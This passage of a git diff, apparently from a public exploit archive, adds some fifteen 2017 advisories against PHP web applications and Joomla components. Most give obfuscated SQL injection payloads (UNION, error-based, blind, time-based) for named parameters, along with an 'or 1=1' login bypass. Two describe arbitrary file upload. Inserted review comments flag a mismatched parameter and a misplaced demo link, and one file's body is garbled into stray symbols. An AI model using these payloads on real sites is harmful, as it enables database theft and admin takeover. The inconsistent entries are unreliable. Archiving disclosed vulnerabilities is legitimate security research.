+# Payload: id=2271 OR SLEEP(5)
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43087.txt b/platforms/php/webapps/43087.txt
new file mode 100755
index 000000000..3b891705f
--- /dev/null
+++ b/platforms/php/webapps/43087.txt
@@ -0,0 +1,32 @@
+# # # # #
+# Exploit Title: SoftDatepro Dating Social Network 1.3 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.softdatepro.com/
+# Software Link: https://codecanyon.net/item/softdatepro-build-your-own-dating-social-network/3650044
+# Demo: http://demo.softdatepro.com/
+# Version: 1.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15972
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/viewprofile.php?profid=[SQL]
+# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]
+#
+# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-
+#
+# http://localhost/[PATH]/admin
+#
+# Email: 'or 1=1 or ''=' Pass: anything
+#
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/43088.txt b/platforms/php/webapps/43088.txt
new file mode 100755
index 000000000..48278ec14
--- /dev/null
+++ b/platforms/php/webapps/43088.txt
@@ -0,0 +1,32 @@
+# # # # #
+# Exploit Title: Same Sex Dating Software Pro 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.softdatepro.com/
+# Software Link: https://codecanyon.net/item/same-date-pro-same-sex-dating-software/4530959
+# Demo: http://www.ss.softdatepro.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15971
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an users to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/viewprofile.php?profid=[SQL]
+# http://localhost/[PATH]/viewmessage.php?sender_id=[SQL]
+#
+# -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+-
+#
+# http://localhost/[PATH]/admin
+#
+# Email: 'or 1=1 or ''=' Pass: anything
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43089.txt b/platforms/php/webapps/43089.txt
new file mode 100755
index 000000000..fd9db24bf
--- /dev/null
+++ b/platforms/php/webapps/43089.txt
@@ -0,0 +1,34 @@
+# # # # #
+# Exploit Title: PHP CityPortal 2.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.phpcityportal.com/
+# Software Link: http://www.phpcityportal.com/index.php
+# Demo: http://phpcityportal.com/demo
+# Version: 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15970
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?page=news&nid=[SQL]
+#
+# Parameter: cat (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
+# Payload: cat=1' OR NOT 6616=6616#
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+# Payload: cat=1' OR SLEEP(5)-- cCQQ
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43090.txt b/platforms/php/webapps/43090.txt
new file mode 100755
index 000000000..56ff06c9f
--- /dev/null
+++ b/platforms/php/webapps/43090.txt
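Review bot: The proof-of-concept URL in 43089.txt names the injectable parameter as `nid` (`index.php?page=news&nid=[SQL]`), but the scanner block beneath it reports `Parameter: cat (GET)` with `cat=1' ...` payloads, so the file never says which parameter is actually affected. Anyone trying to confirm the finding or patch the right query handler needs the two to agree; either the URL should read `index.php?page=news&cat=[SQL]` or the parameter block should be the one recorded for `nid`.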
@@ -0,0 +1,107 @@ +# # # # # +# Exploit Title: PG All Share Video 1.0 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.pilotgroup.net/ +# Software Link: http://www.allsharevideo.com/features.php +# Demo: http://demo.allsharevideo.com/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15969 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/search/tag/[SQL] +# http://localhost/[PATH]/friends/index/1[SQL] +# http://localhost/[PATH]/users/profile/1[SQL] +# http://localhost/[PATH]/video_catalog/category/1[SQL] +# +# 'ANd(/*!06666seleCt+*/1/*!06666frOm*/(/*!06666seleCt*/%20COunt(*),/*!06666COnCAt*/((seleCt(seleCt+COnCAt(CAst(dAtAbAse()As%20ChAr),0x7e,0x496873616E53656e63616e))%20frOm%20infOrmAtiOn_sChemA.tAbles%20where%20tAble_sChemA=dAtAbAse()%20limit%200,1),flOOr(rAnd(0)*2))x%20frOm%20infOrmAtiOn_sChemA.tAbles%20grOup%20by%20x)A)%20AnD%20''=' +# +# Parameter: #1* (URI) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND 2686=2686 AND 'UsmZ'='UsmZ +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND (SELECT 4572 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(4572=4572,1))),0x716b627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iudq'='iudq +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: http://localhost/[PATH]/search/tag/VerAyari' AND SLEEP(5) AND 'iczN'='iczN +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 3 columns +# Payload: http://localhost/[PATH]/search/tag/VerAyari' UNION ALL 
SELECT NULL,NULL,CONCAT(0x71717a6a71,0x4b6e4a524653614e47727a4f4464575253424c4d6c544f6b6a78454e4a756c75794d6a7765697269,0x716b627871)-- mAFc +# +# Parameter: #1* (URI) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: http://localhost/[PATH]/channels/category/7' AND 4239=4239 AND 'oXBo'='oXBo +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: http://localhost/[PATH]/channels/category/7' AND (SELECT 4458 FROM(SELECT COUNT(*),CONCAT(0x7170626b71,(SELECT (ELT(4458=4458,1))),0x7176787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JBxT'='JBxT +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 3 columns +# Payload: http://localhost/[PATH]/channels/category/7' UNION ALL SELECT NULL,NULL,CONCAT(0x7170626b71,0x574355636a666d516c4d437a78696a5a6243555a46486f494a45455a6c49574e577765704a496367,0x7176787071)-- kJpu +# +# Parameter: #1* (URI) +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause +# Payload: http://localhost/[PATH]/friends/index/11' RLIKE (SELECT (CASE WHEN (2135=2135) THEN 11 ELSE 0x28 END))-- SVFb +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: http://localhost/[PATH]/friends/index/11' AND (SELECT 1564 FROM(SELECT COUNT(*),CONCAT(0x7170786a71,(SELECT (ELT(1564=1564,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DoZE +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 OR time-based blind +# Payload: http://localhost/[PATH]/friends/index/11' OR SLEEP(5)-- Maum +# +# Parameter: #1* (URI) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: http://localhost/[PATH]/users/profile/1' AND 3612=3612 AND 'wNwI'='wNwI +# +# Type: error-based +# Title: MySQL >= 5.0 AND 
error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: http://localhost/[PATH]/users/profile/1' AND (SELECT 3555 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT (ELT(3555=3555,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XrEj'='XrEj +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: http://localhost/[PATH]/users/profile/1' AND SLEEP(5) AND 'XZVf'='XZVf +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 3 columns +# Payload: http://localhost/[PATH]/users/profile/1' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767671,0x7a7a646e536849756f717771546e4547497549465459754f65636946535375667577596755616876,0x717a7a7a71)-- UaUA +# +# Parameter: #1* (URI) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: http://localhost/[PATH]/video_catalog/category/1' AND 4550=4550 AND 'SAmI'='SAmI +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: http://localhost/[PATH]/video_catalog/category/1' AND (SELECT 4089 FROM(SELECT COUNT(*),CONCAT(0x716a6a7171,(SELECT (ELT(4089=4089,1))),0x716b786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PTze'='PTze +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: http://localhost/[PATH]/video_catalog/category/1' AND SLEEP(5) AND 'ptLy'='ptLy +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 3 columns +# Payload: http://localhost/[PATH]/video_catalog/category/1' UNION ALL SELECT NULL,NULL,CONCAT(0x716a6a7171,0x4c5a694b4948566c59527663484b7a466c76725746684863506159646973414749617966634d5145,0x716b786a71)-- zDQK +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43091.txt b/platforms/php/webapps/43091.txt new file mode 100755 index 000000000..474e5bb11 --- /dev/null +++ b/platforms/php/webapps/43091.txt 
@@ -0,0 +1,40 @@
+# # # # #
+# Exploit Title: MyBuilder Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.contractorscripts.com/
+# Software Link: http://order.contractorscripts.com/
+# Demo: http://demo.contractorscripts.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15968
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/phpsqlsearch_genxml.php?subcategory=[SQL]
+#
+# 1'++aND(/*!09999sELeCT*/+0x30783331+/*!09999FrOM*/+(/*!09999SeLeCT*/+cOUNT(*),/*!09999CoNCaT*/((sELEcT(sELECT+/*!09999CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='
+#
+# Parameter: subcategory (GET)
+# Type: boolean-based blind
+# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+# Payload: subcategory=1' RLIKE (SELECT (CASE WHEN (9811=9811) THEN 1 ELSE 0x28 END))-- gzxz
+#
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: subcategory=1' AND (SELECT 1213 FROM(SELECT COUNT(*),CONCAT(0x7162626a71,(SELECT (ELT(1213=1213,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qHTp
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+# Payload: subcategory=1' OR SLEEP(5)-- RvzR
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43092.txt b/platforms/php/webapps/43092.txt
new file mode 100755
index 000000000..076592bde
--- /dev/null
+++ b/platforms/php/webapps/43092.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Mailing List Manager Pro 3.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.vote-pro.com/
+# Software Link: http://www.mailing-manager.com/demo.html
+# Demo: http://www.mailing-manager.com/demo-gold/
+# Version: 3.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15967
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an users to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin/users/?sort=login&edit=[SQL]
+#
+# -2'++/*!03333UNION*/(/*!03333SELECT*/0x283129,0x283229,0x283329,/*!03333CONCAT_WS*/(0x203a20,USER()),0x283529,/*!03333CONCAT_WS*/(0x203a20,DATABASE()),/*!03333CONCAT_WS*/(0x203a20,VERSION()),0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429)--+-
+#
+# http://localhost/[PATH]/admin/template/?edit=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43093.txt b/platforms/php/webapps/43093.txt
new file mode 100755
index 000000000..774f8ec6a
--- /dev/null
+++ b/platforms/php/webapps/43093.txt
@@ -0,0 +1,34 @@
+# # # # #
+# Exploit Title: Joomla! Component Zh YandexMap 6.1.1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://zhuk.cc/
+# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-yandexmap/
+# Demo: http://joomla.zhuk.cc/index.php
+# Version: 6.1.1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15966
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=[SQL]
+#
+# Parameter: placemarklistid (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+# Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-8164) OR 5013=5013#
+#
+# Type: error-based
+# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+# Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-1660) OR 1 GROUP BY CONCAT(0x71627a7871,(SELECT (CASE WHEN (6691=6691) THEN 1 ELSE 0 END)),0x716b7a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43094.txt b/platforms/php/webapps/43094.txt
new file mode 100755
index 000000000..898e40ea9
--- /dev/null
+++ b/platforms/php/webapps/43094.txt
@@ -0,0 +1,34 @@
+# # # # #
+# Exploit Title: Joomla! Component NS Download Shop 2.2.6 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: https://nswd.co/
+# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/paid-downloads/ns-downloadshop/
+# Demo: https://ds.nswd.co/
+# Version: 2.2.6
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15965
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?option=com_ns_downloadshop&task=invoice.create&id=[SQL]
+#
+# Parameter: id (GET)
+# Type: boolean-based blind
+# Title: MySQL >= 5.0 boolean-based blind - Parameter replace
+# Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT (CASE WHEN (5078=5078) THEN 5078 ELSE 5078*(SELECT 5078 FROM INFORMATION_SCHEMA.PLUGINS) END))
+#
+# Type: error-based
+# Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
+# Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT 2458 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2458=2458,1))),0x7178627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43095.txt b/platforms/php/webapps/43095.txt
new file mode 100755
index 000000000..5dbf9c370
--- /dev/null
+++ b/platforms/php/webapps/43095.txt
@@ -0,0 +1,34 @@
+# # # # #
+# Exploit Title: Job Board Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.nicephpscripts.com/
+# Software http://www.nicephpscripts.com/job_board_script.htm
+# Demo: http://www.nicephpscripts.com/scripts/faqscript/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15964
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?nice_theme=[SQL]
+#
+# Parameter: nice_theme (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: nice_theme=2 AND 9686=9686
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: nice_theme=2 AND SLEEP(5)
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43096.txt b/platforms/php/webapps/43096.txt
new file mode 100755
index 000000000..ab6aa12c2
--- /dev/null
+++ b/platforms/php/webapps/43096.txt
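Review bot: The `Demo:` line in 43095.txt points at `http://www.nicephpscripts.com/scripts/faqscript/`, whose path names a FAQ script rather than the Job Board Script in the title and on the `Software` line, so it looks like it may have been carried over from another advisory. If the injection in `nice_theme` was confirmed against the job-board demo, the line should point there; if it was only observed on the FAQ script, the title and affected-product lines are the ones that need correcting.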
@@ -0,0 +1,40 @@
+# # # # #
+# Exploit Title: iTech Gigs Script 1.21 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://itechscripts.com/
+# Software Link: http://itechscripts.com/the-gigs-script/
+# Demo: http://gigs.itechscripts.com/
+# Version: 1.21
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15963
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/browse-scategory.php?sc=[SQL]
+#
+# -12c4ca4238a0b923820dcc509a6f75849b'++/*!08888UNIoN*/(/*!08888SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,(/*!08888SElEct*/+Export_sEt(5,@:=0,(/*!08888sElEct*/+count(*)/*!08888from*/(information_schEma.columns)whErE@:=Export_sEt(5,Export_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888column_namE*/,0xa3a,2)),@,2)),0x283829,0x283929,0x28313029)--+-
+#
+# http://localhost/[PATH]/service-provider.php?ser=[SQL]
+#
+# -9553'++/*!50000UNION*/+/*!50000SELECT*/+1,2,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
+#
+# Parameter: sc (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: sc=12c4ca4238a0b923820dcc509a6f75849b' AND 5747=5747 AND 'tzJH'='tzJH
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 10 columns
+# Payload: sc=-5921' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7a71,0x74624c4f7167546e4676635467647269456244634147776d584b77796e4870674661646a7a44485a,0x717a6a7a71),NULL,NULL,NULL-- bjaB
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43097.txt b/platforms/php/webapps/43097.txt
new file mode 100755
index 000000000..c6c57154f
--- /dev/null
+++ b/platforms/php/webapps/43097.txt
@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: iStock Management System 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://ikodes.com/
+# Software Link: https://codecanyon.net/item/istock-management-system/20405084
+# Demo: http://project.ikodes.com/basicims/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15962
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an users upload arbitrary file....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/user/profile
+# http://localhost/[PATH]//assets/images/[FILE]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43098.txt b/platforms/php/webapps/43098.txt
new file mode 100755
index 000000000..9c70ed50b
--- /dev/null
+++ b/platforms/php/webapps/43098.txt
@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: iProject Management System 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://ikodes.com/
+# Software Link: https://codecanyon.net/item/iproject-management-system/20483358
+# Demo: http://project.ikodes.com/ikpms/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15961
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an users to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?cmd=agent&mod=true&ID=[SQL]
+# http://localhost/[PATH]/index.php?cmd=client_master&mod=true&ID=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43099.txt b/platforms/php/webapps/43099.txt
new file mode 100755
index 000000000..bb46bf0ed
--- /dev/null
+++ b/platforms/php/webapps/43099.txt
@@ -0,0 +1,43 @@
+# # # # #
+# Exploit Title: Article Directory Script 3.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.yourarticlesdirectory.com/
+# Software Link: http://www.yourarticlesdirectory.com/
+# Demo: http://www.yourarticlesdirectory.com/livedemo.php
+# Version: 3.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15960
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/category.php?id=[SQL]
+#
+# 18++/*!02222UniOn*/+(/*!02222SeleCt*/+0x283129,/*!02222CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,0x283429,0x3078323833353239)--+-
+#
+# http://localhost/[PATH]/author.php?id=[SQL]
+#
+# Parameter: id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: id=18 AND 8646=8646
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: id=18 AND SLEEP(5)
+#
+# Parameter: id (GET)
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: id=27 AND SLEEP(5)
+#
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/43100.txt b/platforms/php/webapps/43100.txt
new file mode 100755
index 000000000..abc2879ee
--- /dev/null
+++ b/platforms/php/webapps/43100.txt
@@ -0,0 +1,32 @@
+# # # # #
+# Exploit Title: Adult Script Pro 2.2.4 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.adultscriptpro.com/
+# Software Link: http://www.adultscriptpro.com/order.html
+# Demo: http://www.adultscriptpro.com/demo.html
+# Version: 2.2.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15959
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/download/[SQL]
+#
+# VerAyari+aNd(SELeCT+1+FroM(SELECT+CoUNT(*),CoNCat((SeLECT+(SELECT+CoNCat(CaST(VERSIoN()+aS+ChaR),0x7e,0x496873616E53656e63616e))+FroM+INFoRMaTIoN_SChEMa.TaBLES+LIMIT+0,1),FLooR(RaNd(0)*2))x+FroM+INFoRMaTIoN_SChEMa.TaBLES+GRoUP+BY+x)a)
+#
+# Parameter: #1* (URI)
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: http://localhost/[PATH]/download/Verayari AND (SELECT 4247 FROM(SELECT COUNT(*),CONCAT(0x716a717a71,(SELECT (ELT(4247=4247,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/43101.txt b/platforms/php/webapps/43101.txt
new file mode 100755
index 000000000..0504d53af
--- /dev/null
+++ b/platforms/php/webapps/43101.txt
@@ -0,0 +1,29 @@
+ +
+ + + + + +
diff --git a/platforms/php/webapps/43102.txt b/platforms/php/webapps/43102.txt
new file mode 100755
index 000000000..4bc47379a
--- /dev/null
+++ b/platforms/php/webapps/43102.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Ingenious School Management System 2.3.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://iloveprograming.com/
+# Software Link: https://www.codester.com/items/4945/ingenious-school-management-system
+# Demo: http://iloveprograming.com/view/login.php
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15957
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+#
+# The vulnerability allows an student,teacher upload arbitrary file....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/my_profile.php
+# http://localhost/[PATH]/uploads/[FILE]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/remote/6880.html b/platforms/windows/remote/6880.html
index 600eb0535..f59725193 100755
--- a/platforms/windows/remote/6880.html
+++ b/platforms/windows/remote/6880.html
@@ -104,7 +104,7 @@ function x() {
